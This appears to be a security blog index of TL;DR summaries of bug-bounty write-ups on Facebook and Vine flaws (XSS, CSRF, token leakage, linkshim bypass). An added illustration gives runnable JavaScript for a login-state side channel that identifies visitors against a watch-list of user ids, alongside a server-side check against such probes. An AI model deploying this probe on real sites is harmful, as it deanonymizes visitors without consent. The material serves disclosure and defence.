TL;DR: By abusing auth-based redirections and user-specific URIs on modern web applications, an attacker can easily identify and deanonymize visitors belonging to any given predefined group of users across the web.
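The following is an added illustration of the login-state side channel this teaser describes; it is not code from the original post. The target origin, the user-specific path and the watch-list of user ids are assumed/constructed, as is the rule that the resource returns the real image only to its owner and redirects everyone else to an HTML login page. The last function is the defensive counterpart a site owner can add.

```javascript
// Added illustration of the login-state side channel described above; it is not code from the
// original post. Target host, path and user ids are assumed/constructed.
const TARGET_ORIGIN = 'https://target.example';   // assumed target
const WATCHLIST = ['1001', '1002', '1003'];         // constructed set of user ids to test for

// Hypothetical user-specific URI: assumed to return the real image (HTTP 200) only when the
// visitor is logged in as <userId>, and to redirect (302) to an HTML login page otherwise.
function probeUrlFor(userId) {
  return `${TARGET_ORIGIN}/users/${encodeURIComponent(userId)}/avatar-private.png`;
}

// Browser-side loader: an <img> fires onload only if the response decodes as an image, so a
// redirect to the login page surfaces as onerror. No CORS is involved because no data is read.
function browserImageLoader(url) {
  return new Promise(resolve => {
    const img = new Image();
    img.onload = () => resolve(true);
    img.onerror = () => resolve(false);
    img.src = url;
  });
}

// Offline stand-in for the target (constructed): mimics the auth-based redirect above.
function simulatedLoader(loggedInUserId) {
  return url => {
    const m = url.match(/\/users\/([^/]+)\/avatar-private\.png$/);
    const isOwner = m !== null && decodeURIComponent(m[1]) === loggedInUserId;
    return Promise.resolve(isOwner); // true = 200 image (onload), false = 302 to /login (onerror)
  };
}

// Probe every watch-listed id in parallel; returns the ids whose resource loaded, i.e. who the
// visitor is logged in as (normally zero or one id).
async function identifyVisitor(candidates, loadImage = browserImageLoader) {
  const results = await Promise.all(
    candidates.map(async id => ({ id, loggedInAs: await loadImage(probeUrlFor(id)) }))
  );
  return results.filter(r => r.loggedInAs).map(r => r.id);
}

// Defensive counterpart for the site owner: if a user-specific resource is requested cross-site
// in no-cors mode (how <img>/<script> probes arrive), answer identically whether or not the
// visitor is logged in, so the load/error outcome carries no information. Relies on the
// Sec-Fetch-* request headers modern browsers send; pair it with
// Cross-Origin-Resource-Policy: same-origin for browsers that do not send them.
function isCrossSiteNoCorsProbe(headers) {
  const h = Object.fromEntries(
    Object.entries(headers).map(([k, v]) => [k.toLowerCase(), String(v).toLowerCase()])
  );
  return h['sec-fetch-site'] === 'cross-site' && h['sec-fetch-mode'] === 'no-cors';
}

// Demo against the simulated target: a visitor who is logged in as user 1002.
identifyVisitor(WATCHLIST, simulatedLoader('1002')).then(ids => console.log('visitor is:', ids));
```

In a real page the attacker would call `identifyVisitor(WATCHLIST)` with the default `browserImageLoader`; the simulated loader exists only so the logic can be run offline. Note that the probe reveals one bit per candidate, so a large watch-list costs one request per id.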
TL;DR: While doing some bug bounty hunting as usual, I ended up with a very cool reflected XSS vulnerability affecting Vine; here is the story behind it.
TL;DR: Here I’ll be talking about an interesting bypass for the so-called «linkshim system», which Facebook mainly relies upon to protect its users from malicious URLs shared across the whole platform…
TL;DR: This is a complementary entry to my previous writeup of the same title; here I’ll be talking about an interesting download carpet-bombing exploit alongside some functionality bug(s)…
TL;DR: Some interesting URL spoofing attacks, some functionality bugs and a neat exploit to blow up your favourite browser… I just got excited after reading “The Browser Hacker’s Handbook”!
TL;DR: A CSRF vulnerability that could reset a Facebook user’s post-by-email address was hidden deep inside the Facebook mobile site, where you first have to trigger a legacy-browser fallback mode and then tweak some parameter(s) to reach it!
TL;DR: By abusing Facebook social plugins like the activity feed plugin and/or the recommendations plugin, an attacker could retrieve valid sensitive tokens (e.g. access or m_sess tokens) that had been unwittingly shared publicly across the Facebook platform…
TL;DR: Before Facebook’s migration to OAuth 2.0, it was possible to hijack a valid access token of any given pre-authorized Facebook app by injecting a specially crafted iframe through a simple MITM attack.